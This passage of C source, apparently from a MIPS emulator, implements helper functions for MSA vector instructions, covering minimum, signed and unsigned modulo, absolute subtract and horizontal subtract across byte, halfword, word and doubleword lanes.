helper_msa_min_a_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_min_a_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_min_a_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_min_s_df(uint32_t df, int64_t arg1, int64_t arg2) { return arg1 < arg2 ? arg1 : arg2; } void helper_msa_min_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_min_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_min_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_min_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_min_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_min_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_min_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_min_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_min_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_min_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_min_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_min_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_min_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_min_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_min_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_min_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_min_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_min_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_min_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_min_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_min_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_min_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_min_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_min_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_min_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_min_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_min_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_min_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_min_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_min_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_min_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_min_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_min_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_min_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_min_u_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); return u_arg1 < u_arg2 ? arg1 : arg2; } void helper_msa_min_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_min_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_min_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_min_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_min_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_min_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_min_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_min_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_min_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_min_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_min_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_min_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_min_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_min_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_min_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_min_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_min_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_min_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_min_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_min_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_min_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_min_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_min_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_min_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_min_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_min_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_min_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_min_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_min_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_min_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_min_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_min_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_min_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_min_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* * Int Modulo * ---------- * * +---------------+----------------------------------------------------------+ * | MOD_S.B | Vector Signed Modulo (byte) | * | MOD_S.H | Vector Signed Modulo (halfword) | * | MOD_S.W | Vector Signed Modulo (word) | * | MOD_S.D | Vector Signed Modulo (doubleword) | * | MOD_U.B | Vector Unsigned Modulo (byte) | * | MOD_U.H | Vector Unsigned Modulo (halfword) | * | MOD_U.W | Vector Unsigned Modulo (word) | * | MOD_U.D | Vector Unsigned Modulo (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_mod_s_df(uint32_t df, int64_t arg1, int64_t arg2) { if (arg1 == DF_MIN_INT(df) && arg2 == -1) { return 0; } return arg2 ? arg1 % arg2 : arg1; } void helper_msa_mod_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_mod_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_mod_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_mod_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_mod_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_mod_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_mod_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_mod_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_mod_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_mod_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_mod_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_mod_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_mod_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_mod_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_mod_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_mod_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_mod_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_mod_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_mod_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_mod_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_mod_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_mod_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_mod_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_mod_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_mod_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_mod_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_mod_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_mod_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_mod_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_mod_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_mod_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_mod_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_mod_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_mod_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_mod_u_df(uint32_t df, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); return u_arg2 ? u_arg1 % u_arg2 : u_arg1; } void helper_msa_mod_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_mod_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_mod_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_mod_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_mod_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_mod_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_mod_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_mod_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_mod_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_mod_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_mod_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_mod_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_mod_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_mod_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_mod_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_mod_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_mod_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_mod_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_mod_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_mod_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_mod_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_mod_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_mod_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_mod_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_mod_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_mod_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_mod_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_mod_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_mod_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_mod_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_mod_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_mod_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_mod_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_mod_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* * Int Multiply * ------------ * * +---------------+----------------------------------------------------------+ * | MADDV.B | Vector Multiply and Add (byte) | * | MADDV.H | Vector Multiply and Add (halfword) | * | MADDV.W | Vector Multiply and Add (word) | * | MADDV.D | Vector Multiply and Add (doubleword) | * | MSUBV.B | Vector Multiply and Subtract (byte) | * | MSUBV.H | Vector Multiply and Subtract (halfword) | * | MSUBV.W | Vector Multiply and Subtract (word) | * | MSUBV.D | Vector Multiply and Subtract (doubleword) | * | MULV.B | Vector Multiply (byte) | * | MULV.H | Vector Multiply (halfword) | * | MULV.W | Vector Multiply (word) | * | MULV.D | Vector Multiply (doubleword) | * +---------------+----------------------------------------------------------+ */ /* TODO: insert Int Multiply group helpers here */ /* * Int Subtract * ------------ * * +---------------+----------------------------------------------------------+ * | ASUB_S.B | Vector Absolute Values of Signed Subtract (byte) | * | ASUB_S.H | Vector Absolute Values of Signed Subtract (halfword) | * | ASUB_S.W | Vector Absolute Values of Signed Subtract (word) | * | ASUB_S.D | Vector Absolute Values of Signed Subtract (doubleword) | * | ASUB_U.B | Vector Absolute Values of Unsigned Subtract (byte) | * | ASUB_U.H | Vector Absolute Values of Unsigned Subtract (halfword) | * | ASUB_U.W | Vector Absolute Values of Unsigned Subtract (word) | * | ASUB_U.D | Vector Absolute Values of Unsigned Subtract (doubleword) | * | HSUB_S.H | Vector Signed Horizontal Subtract (halfword) | * | HSUB_S.W | Vector Signed Horizontal Subtract (word) | * | HSUB_S.D | Vector Signed Horizontal Subtract (doubleword) | * | HSUB_U.H | Vector Unigned Horizontal Subtract (halfword) | * | HSUB_U.W | Vector Unigned Horizontal Subtract (word) | * | HSUB_U.D | Vector Unigned Horizontal Subtract (doubleword) | * | SUBS_S.B | Vector Signed Saturated Subtract (of Signed) (byte) | * | SUBS_S.H | Vector Signed Saturated Subtract (of Signed) (halfword) | * | SUBS_S.W | Vector Signed Saturated Subtract (of Signed) (word) | * | SUBS_S.D | Vector Signed Saturated Subtract (of Signed) (doubleword)| * | SUBS_U.B | Vector Unsigned Saturated Subtract (of Uns.) (byte) | * | SUBS_U.H | Vector Unsigned Saturated Subtract (of Uns.) (halfword) | * | SUBS_U.W | Vector Unsigned Saturated Subtract (of Uns.) (word) | * | SUBS_U.D | Vector Unsigned Saturated Subtract (of Uns.) (doubleword)| * | SUBSUS_U.B | Vector Uns. Sat. Subtract (of S. from Uns.) (byte) | * | SUBSUS_U.H | Vector Uns. Sat. Subtract (of S. from Uns.) (halfword) | * | SUBSUS_U.W | Vector Uns. Sat. Subtract (of S. from Uns.) (word) | * | SUBSUS_U.D | Vector Uns. Sat. Subtract (of S. from Uns.) (doubleword) | * | SUBSUU_S.B | Vector Signed Saturated Subtract (of Uns.) (byte) | * | SUBSUU_S.H | Vector Signed Saturated Subtract (of Uns.) (halfword) | * | SUBSUU_S.W | Vector Signed Saturated Subtract (of Uns.) (word) | * | SUBSUU_S.D | Vector Signed Saturated Subtract (of Uns.) (doubleword) | * | SUBV.B | Vector Subtract (byte) | * | SUBV.H | Vector Subtract (halfword) | * | SUBV.W | Vector Subtract (word) | * | SUBV.D | Vector Subtract (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_asub_s_df(uint32_t df, int64_t arg1, int64_t arg2) { /* signed compare */ return (arg1 < arg2) ? (uint64_t)(arg2 - arg1) : (uint64_t)(arg1 - arg2); } void helper_msa_asub_s_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_asub_s_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_asub_s_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_asub_s_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_asub_s_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_asub_s_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_asub_s_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_asub_s_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_asub_s_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_asub_s_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_asub_s_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_asub_s_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_asub_s_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_asub_s_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_asub_s_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_asub_s_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_asub_s_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_asub_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_asub_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_asub_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_asub_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_asub_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_asub_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_asub_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_asub_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_asub_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_asub_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_asub_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_asub_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_asub_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_asub_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_asub_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_asub_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_asub_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline uint64_t msa_asub_u_df(uint32_t df, uint64_t arg1, uint64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_arg2 = UNSIGNED(arg2, df); /* unsigned compare */ return (u_arg1 < u_arg2) ? (uint64_t)(u_arg2 - u_arg1) : (uint64_t)(u_arg1 - u_arg2); } void helper_msa_asub_u_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_asub_u_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_asub_u_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_asub_u_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_asub_u_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_asub_u_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_asub_u_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_asub_u_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_asub_u_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_asub_u_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_asub_u_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_asub_u_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_asub_u_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_asub_u_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_asub_u_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_asub_u_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_asub_u_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_asub_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_asub_u_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_asub_u_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_asub_u_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_asub_u_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_asub_u_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_asub_u_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_asub_u_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_asub_u_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_asub_u_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_asub_u_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_asub_u_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_asub_u_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_asub_u_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_asub_u_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_asub_u_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_asub_u_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } /* TODO: insert the rest of Int Subtract group helpers here */ static inline int64_t msa_hsub_s_df(uint32_t df, int64_t arg1, int64_t arg2) { return SIGNED_ODD(arg1, df) - SIGNED_EVEN(arg2, df); } void helper_msa_hsub_s_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_hsub_s_df(DF_HALF, pws->h[0], pwt->h[0]); pwd->h[1] = msa_hsub_s_df(DF_HALF, pws->h[1], pwt->h[1]); pwd->h[2] = msa_hsub_s_df(DF_HALF, pws->h[2], pwt->h[2]); pwd->h[3] = msa_hsub_s_df(DF_HALF, pws->h[3], pwt->h[3]); pwd->h[4] = msa_hsub_s_df(DF_HALF, pws->h[4], pwt->h[4]); pwd->h[5] = msa_hsub_s_df(DF_HALF, pws->h[5], pwt->h[5]); pwd->h[6] = msa_hsub_s_df(DF_HALF, pws->h[6], pwt->h[6]); pwd->h[7] = msa_hsub_s_df(DF_HALF, pws->h[7], pwt->h[7]); } void helper_msa_hsub_s_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_hsub_s_df(DF_WORD, pws->w[0], pwt->w[0]); pwd->w[1] = msa_hsub_s_df(DF_WORD, pws->w[1], pwt->w[1]); pwd->w[2] = msa_hsub_s_df(DF_WORD, pws->w[2], pwt->w[2]); pwd->w[3] = msa_hsub_s_df(DF_WORD, pws->w[3], pwt->w[3]); } void helper_msa_hsub_s_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_hsub_s_df(DF_DOUBLE, pws->d[0], pwt->d[0]); pwd->d[1] = msa_hsub_s_df(DF_DOUBLE, pws->d[1], pwt->d[1]); } static inline int64_t msa_hsub_u_df(uint32_t df, int64_t arg1, int64_t arg2) { return UNSIGNED_ODD(arg1, df) - UNSIGNED_EVEN(arg2, df); } void helper_msa_hsub_u_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = 